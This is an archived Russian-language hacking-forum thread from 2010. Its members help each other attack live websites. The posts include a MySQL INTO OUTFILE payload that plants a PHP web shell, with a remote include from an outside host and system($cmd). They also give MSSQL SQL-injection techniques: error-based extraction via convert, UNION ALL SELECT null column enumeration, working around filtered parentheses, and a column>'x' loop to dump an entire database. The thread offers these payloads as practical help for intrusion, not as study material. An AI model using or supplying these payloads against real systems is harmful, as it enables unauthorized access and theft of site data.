Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.02.2010, 18:41
|
|
Новичок
Регистрация: 31.01.2010
Сообщений: 18
Провел на форуме:
62112
Репутация:
0
|
|
прошу помощи есть полный доступ к бд сайта
каким тыком залить на сайт шелл через mysql?
select '<? @include("http://moysite.ru/shell.php"); ?>' into outfile 'сервак стоит на винде'
после заливки открывает пустую страницу
<?php system($cmd) ?> тоже непомог
|
|
|
13.02.2010, 18:42
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
<?phpinfo();?> для начала попробуй залить, заодно увидишь, разрешен ли allow_url_include, allow_url_fopen и system, и еще много чего инетересного увидишь
Последний раз редактировалось Pashkela; 13.02.2010 в 18:45..
|
|
|
|
13.02.2010, 18:45
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Моя очередь вам мозг убить
Есть скуля - MSSQL
тама идёт запрос SELECT * FROM table WHERE id = #id#
id=1 OR 1=@@version = SQL Server 2000
Тоесть есть вывод через ошибки, обычный вывод - геморой, тута страницы 2 надо чоб описать всё, поэтому вопрос про вывод через ошибки
Я знаю структуру БД, такчто таблы мне искать ненад
Мне надо выбить инфу из таблы, вот токо на сайте фильтруются символы
%()[]
Чё делать 
P.S. Про обычный вывод - UNION SELECT... тама 69 поля, и если типы не совпадают - выбивает ошибку, а как я могу узнать в каком поле не совпадают типы =\
И всёже - чё делать с ошибкой
The text, ntext, or image data type cannot be selected as DISTINCT.
гугл говорит заюзать чётотам(varchar(9000)) но скобки запрещены, немогу  |
|
|
|
13.02.2010, 18:47
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
если скобки запрещены - ничего не сделать, вроде бы, инвертировать не получится
PS: но это если скобки действительно запрещены, а так convert(куда_конверт,system_user)
|
|
|
|
13.02.2010, 18:51
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
P.S. Про обычный вывод - UNION SELECT... тама 69 поля, и если типы не совпадают - выбивает ошибку, а как я могу узнать в каком поле не совпадают типы =\
сначала указываешь для всех полей null, потом последовательно подставляешь строки и смотришь в каком по счету поле не будет ошибки.
И всёже - чё делать с ошибкой
Цитата:
The text, ntext, or image data type cannot be selected as DISTINCT.
UNION ALL SELECT
|
|
|
|
13.02.2010, 18:59
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Pashkela, скобки точно запрещены
Сообщение от [Raz0r]
сначала указываешь для всех полей null, потом последовательно подставляешь строки и смотришь в каком по счету поле не будет ошибки.
Указывал все нуллы, всёравно говорит
The text, ntext, or image data type cannot be selected as DISTINCT.
даже указывал
-1 UNION SELECT * FROM %табла, которая используется в запросе%
Опять гвоорит этуже ошибку
В мелкософте какраз такой случай разбирается, но тама скобки нужны
Сообщение от [Raz0r]
UNION ALL SELECT
А вот это непонял куда
1 UNION ALL SELECT = Incorrect syntax near 'SELECT' |
|
|
|
13.02.2010, 19:05
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
правильно, а теперь совмести то, что я сказал про null'ы и ALL SELECT
1 UNION ALL SELECT null,null,null...
|
|
|
|
13.02.2010, 19:14
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Хмммм... хз как, но оно кажись получается, токо надо теперь поля под типы подобрать, цёма
Эммм... А как лимит заюзать
LIMIT 0,1 говорит Incorrect syntax near '0'
я знаю, чо надо юзать NOT IN() но нужны скобки
чё делать
=====
всё, нащёл - ... WHERE column!='value'
Последний раз редактировалось Ponchik; 13.02.2010 в 19:43..
|
|
|
|
13.02.2010, 20:07
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Если нужно вытянуть всю базу..
column>'x'
И ставишь на цикл, каждый раз меняя значение x на новое, вообщем всё просто.
Последний раз редактировалось v1d0qz; 15.02.2010 в 16:12..
|
|
|
|
14.02.2010, 02:31
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
есть сайт site.ru/page.php?id=1. Не могу догнать: когда я подставляю id=1 and 1=2 у меня открывается страница, как для id=1. Как это получается?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
Похожие темы
Линейный вид
